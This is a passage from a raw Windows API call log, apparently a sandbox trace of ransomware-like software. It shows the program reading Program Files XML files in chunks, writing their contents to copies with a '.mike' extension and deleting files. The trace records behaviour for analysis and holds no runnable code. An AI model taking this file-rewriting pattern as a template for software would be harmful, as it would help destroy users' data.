lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0045.296] ReadFile (in: hFile=0x264, lpBuffer=0x22c0adc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22c0adc*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.296] CloseHandle (hObject=0x264) returned 1 [0045.297] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.297] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.297] GetFileType (hFile=0x264) returned 0x1 [0045.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.297] GetFileType (hFile=0x264) returned 0x1 [0045.297] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0045.297] WriteFile (in: hFile=0x264, lpBuffer=0x22cb044*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22cb044*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.298] CloseHandle (hObject=0x264) returned 1 [0045.298] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.298] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.299] GetFileType (hFile=0x264) returned 0x1 [0045.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.299] GetFileType (hFile=0x264) returned 0x1 [0045.299] SetFilePointer (in: hFile=0x264, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0045.299] ReadFile (in: hFile=0x264, lpBuffer=0x22cda9c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22cda9c*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0045.299] CloseHandle (hObject=0x264) returned 1 [0045.300] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.300] GetFileType (hFile=0x264) returned 0x1 [0045.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.300] GetFileType (hFile=0x264) returned 0x1 [0045.300] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0045.300] WriteFile (in: hFile=0x264, lpBuffer=0x22d8004*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22d8004*, lpNumberOfBytesWritten=0x2af094*=0x2800, lpOverlapped=0x0) returned 1 [0045.300] CloseHandle (hObject=0x264) returned 1 [0045.301] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.301] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.301] GetFileType (hFile=0x264) returned 0x1 [0045.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0045.301] GetFileType (hFile=0x264) returned 0x1 [0045.301] ReadFile (in: hFile=0x264, lpBuffer=0x22daa5c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22daa5c*, lpNumberOfBytesRead=0x2af080*=0x1e55, lpOverlapped=0x0) returned 1 [0045.301] CloseHandle (hObject=0x264) returned 1 [0045.302] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.302] GetFileType (hFile=0x264) returned 0x1 [0045.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.302] GetFileType (hFile=0x264) returned 0x1 [0045.302] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0045.302] WriteFile (in: hFile=0x264, lpBuffer=0x22e6f90*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x2af094, lpOverlapped=0x0 | out: lpBuffer=0x22e6f90*, lpNumberOfBytesWritten=0x2af094*=0x1e60, lpOverlapped=0x0) returned 1 [0045.303] CloseHandle (hObject=0x264) returned 1 [0045.304] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0045.304] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.304] GetFileType (hFile=0x264) returned 0x1 [0045.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0045.304] GetFileType (hFile=0x264) returned 0x1 [0045.340] WriteFile (in: hFile=0x264, lpBuffer=0x22eb148*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22eb148*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0045.340] CloseHandle (hObject=0x264) returned 1 [0045.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.341] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe533d7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe533d7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53afbc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9880)) returned 1 [0045.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.341] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22ec8d8 | out: lpFileInformation=0x22ec8d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe533d7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe533d7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53afbc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9880)) returned 1 [0045.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.341] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.342] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", dwFileAttributes=0x80) returned 0 [0045.342] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0045.343] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe533d7a0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe533d7a0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe53afbc0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9880)) returned 1 [0045.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0045.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml", lpFilePart=0x0) returned 0x49 [0045.343] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike", lpFilePart=0x0) returned 0x4e [0045.343] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.mike")) returned 1 [0045.344] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.344] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.344] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0045.344] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0045.357] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.357] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0045.357] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.360] GetFileType (hFile=0x264) returned 0x1 [0045.360] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0045.360] GetFileType (hFile=0x264) returned 0x1 [0045.360] CloseHandle (hObject=0x264) returned 1 [0045.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.361] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0045.361] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0045.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0045.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), fInfoLevelId=0x0, lpFileInformation=0x22eea1c | out: lpFileInformation=0x22eea1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1)) returned 1 [0045.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0045.361] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), fInfoLevelId=0x0, lpFileInformation=0x22eed4c | out: lpFileInformation=0x22eed4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1)) returned 1 [0045.361] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0045.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.361] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.362] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.362] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.362] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike", lpFilePart=0x0) returned 0x51 [0045.362] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0045.362] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.363] GetFileType (hFile=0x264) returned 0x1 [0045.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0045.363] GetFileType (hFile=0x264) returned 0x1 [0045.363] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0045.363] WriteFile (in: hFile=0x264, lpBuffer=0x22efc4c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x22efc4c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0045.364] CloseHandle (hObject=0x264) returned 1 [0045.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0045.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers.xml"), fInfoLevelId=0x0, lpFileInformation=0x22ef734 | out: lpFileInformation=0x22ef734*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f79a7b7, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f79a7b7, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f7c0915, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd1)) returned 1 [0045.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0045.364] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml", lpFilePart=0x0) returned 0x4c [0045.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0045.364] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers.xml" (normalized: 